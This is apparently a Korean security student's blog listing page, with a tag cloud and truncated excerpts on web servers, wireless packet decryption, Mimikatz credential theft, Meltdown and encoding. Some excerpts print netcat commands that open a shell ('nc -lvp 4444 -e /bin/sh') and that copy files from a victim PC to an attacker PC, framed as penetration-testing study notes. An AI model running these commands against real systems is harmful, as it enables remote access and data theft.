일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
- Chrome 작업관리자
- 계정 탈취
- davtest
- OpenID Connect
- cgroups
- 화이트해커
- AttackGraph
- recon-ng
- 프로젝트
- OIDC
- 패시브스캐닝
- Social Network in Game
- airdecap-ng
- Mimikatz
- Container
- 보안
- Mac
- Kublet
- NMAP
- 강의
- Shift + ESC
- 넷크래프트
- dnsenum
- decap
- 무선채널
- ip forwarding
- 액티브스캐닝
- 대학원
- 공격그래프
- SecurityMetric
- Today
- Total
목록궁금 (26)
네른
WAS란 Web Application Server의 줄임말로, 웹 서버를 구성하는 데 있어 주로 사용되는 큰 요소 중 하나이다. 보편적으로 알고있는 웹 서버의 경우, 정적인 웹 페이지를 사용자에게 제공하는 데 주로 사용된다. - 여기서 정적인 웹 페이지란, 사용자의 요청에 따라 이미 서버에 저장되어 있는 특정 파일들을 사용자에게 보여주는 페이지를 말한다. - 사용자는 정적인 웹 페이지를 볼 때, 서버에 저장된 파일, 정보가 변경되지 않는 이상 항상 동일한 화면을 보게 된다. 반면, WAS는 사용자에게 동적 웹 페이지를 제공하고자 할때 주로 사용된다. 정적 페이지에서는 다 처리 할 수 없는 경우, 다시말해 사용자의 요청에 따라 다른 응답을 제공해야 할 때 동적 페이지를 사용하게 된다. - 예를 들어, 웹 ..
프로젝트를 진행하면서, 해당 공격 패킷을 수집해야 하는 일이 생겼다. 해당 공격을 수행하면서, ip forwarding 설정방법이 필요해 간략히 정리한다. echo 1 > /proc/sys/net/ipv4/ip_forward (in Kali linux) sudo sysctl -w net.inet.ip.forwarding = 1 (in MAC OS)
airdecap-ng는 aircrack-ng 유틸리티와 함께 설치되는? 그러한 유틸리티이다. decap에서 알 수 있듯이, 무선 패킷의 헤더를 제거할 수 있다. WEP/WPA/WPA2 패킷 캡처 파일에 대해 사용 가능하며, pcap 확장자의 파일만 가능하다. (Wireshark의 경우, pcapng로 저장하나 옵션중에 pcap으로 저장하는 옵션이 있으므로 그것을 이용하면 된다.) 옵션 airdecap-ng -b "공유기의 MAC 주소(BSSID)" "해독할파일명" airdecap-ng -w "WEP 비밀번호" "해독할파일명" airdecap-ng -e "SSID" -p "WPA/WPA2 passphrase" "해독할파일명" 위 과정을 진행하면, 802.11 헤더가 제거되고 ethernet 헤더가 보이는 ..
맥북에서 wireshark로 패킷을 캡처할 때, monitoring 모드를 설정하는 과정이 선행되어야한다. 이 때, 노트북의 무선 랜 카드 채널을 스니핑하고자 하는 채널로 바꿔주어야 한다 sudo airport --channel=3 이렇게 입력하면 3번 채널로 설정된다. 추가로, airport는 맥북에 기본으로 깔려있으나, 기본 경로가 설정되어있지 않다. sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport 위와 같은 명령어로 심볼릭 링크를 설정해주어야 한다.
Chrome이 메모리를 상당히 많이 사용한다는 것은 유명한 사실이다. 평소 탭을 수십개씩 띄워두는 나로써는 종종 거슬릴때가 있는데, 이를 해결하기 위한 Chrome용 작업관리자가 있다 Windows Chrome 기준, Shift+ESC 키로 Chrome 작업관리자를 수행할 수 있으며, 이를 이용해 탭별 메모리 사용량 / CPU 사용량 등을 알 수 있다.

Mimikatz는 윈도우상에서 각종 계정과 관련된 정보를 탈취하고 이를 해독하기 위한 도구이다. 공격자들이 악성 코드 등에 종종 포함하여 공격에 사용하곤 하는 도구로, 본래 목적은 취약점을 MS측에 알리기 위해 개발되었다고 한다. 이번 포스트에서는, Mimikatz의 다양한 기능보다는 윈도우 내의 관리자 계정을 탈취하는 기능을 실행해보고자 한다. Mimikatz는 GitHub상에 무료로 공개되어있기에 누구나 접근하여 다운로드할 수 있다. (대부분의 AV에서 악성 프로그램으로 여겨지기에 보안기능을 모두 제거해야 다운로드가 가능하다.) (https://github.com/gentilkiwi/mimikatz) 본 실습은 MS측에서 무료로 제공하는 테스트용 Windows 7에서 진행하였다. Mimikatz를 실..
Bind shell(바인드 쉘) : 공격자가 타겟 호스트(피해자 PC)에서 포트를 열고 리스닝 하는 것 / 공격자 호스트에서 피해자 호스트에 접속 Reverse shell(리버스 쉘) : 공격자가 본인 호스트에서 포트를 열고 리스닝 하는 것 / 피해자 호스트에서 공격자 호스트에 접속 왜? 공격 대상에 방화벽이 설정되어있음을 대비하여! -> In-bound는 빡빡하나, Out-bound는 상대적으로 덜한 경우가 많기에! 대표적인 bind/reverse shell 생성법 -> nc -lvp 4444 -e /bin/sh -> 이외에도, perl, python, php, ruby 등 다양한 방법으로 열 수 있다. 참고. Mac 에서는 역시나 -lvp가 안된다. 그런데, 마찬가지로 -e 옵션도 안된다. 이는 li..
넷캣은 네트워크를 통해 호스트간 간단한 데이터를 읽고 쓰는 데 주로 사용되는 유틸리티이다. telnet 등을 이용할 때 종종 이용하곤 하는데, 모의해킹 관련 공부를 진행하면서 모의해킹에도 주로 사용하는 기능이 있다고 해서 정리해보았다. 공격자가 피해자의 PC에 접속한 경우, 피해자의 PC에서 특정 파일을 빼내오고싶을 때 종종 사용하는 기능이다. 크게 클라이언트와 서버측으로 나누어보자 서버(공격자 PC) nc -lvp port_num > 저장할 파일 명 클라이언트(피해자 PC) nc -q 0 ip_addr port_num 이렇게 하면, 공격자 측에서 포트를 열어두고 피해자 측에서 nc를 통해 접속해서 파일을 전송할 수 있음 --> linux 계열에서 < 의 의미를 생각해보면 알 ..
[정보보안] 4. CPU Meltdown 요즘 가장 핫한 취약점 하면 역시 Meltdown이 아닐까.개인적인 생각으로는, 이 취약점에 대한 분석과 대응 또한 중요하지만, Intel의 대처와 전후 행동들에 대해서도 생각해보아야 하지 않을까 싶다. 각설하고, 이번에는 Meltdown에 대해 알아보려한다.*** 주의 : 해당 공격 기법의 원리가 100프로 정확한지 검증하지 못했다. 논문을 좀 더 읽어보아야 할 것 같은데.. 언제가 될 지는 모르겠다.물론, Meltdown이 뭔지 그리고 우리의 컴퓨터에는 어떠한 영향을 미치는지도 중요하지만, 그보다는 해당 Exploit의 작동 원리에 대해서 중점적으로 Araboza. [사진 1] Meltdown Vulnerability의 Logo (출처 : Wikipedia) ..
[정보보안] 3. Encoding vs Encryption vs Hashing vs Obfuscation 친구랑 이런저런 이야기를 나누다가, Encoding과 Encryption에 대한 이야기가 나왔다. 두 용어를 오용하여 혼났는데, 이 참에 다시한번 해당 개념에 대해 정리해보려한다. 1. Encoding- Encoding은 쉽게 생각해서 '치환' 이라고 보면 된다. - URL Encoding, 즉 사용자가 타이핑 한 값을 컴퓨터가 이해할 수 있도록 '치환' 해주는 Encoding.- 그러므로 Encoding은 Security의 측면에서는 전혀 역할이 없다고 볼 수 있다.- 심지어 이러한 Encoding들은 Encoding Table과 같은 방식으로 모든 정보가 공개되어있어, 역연산 또한 쉽다. 2. E..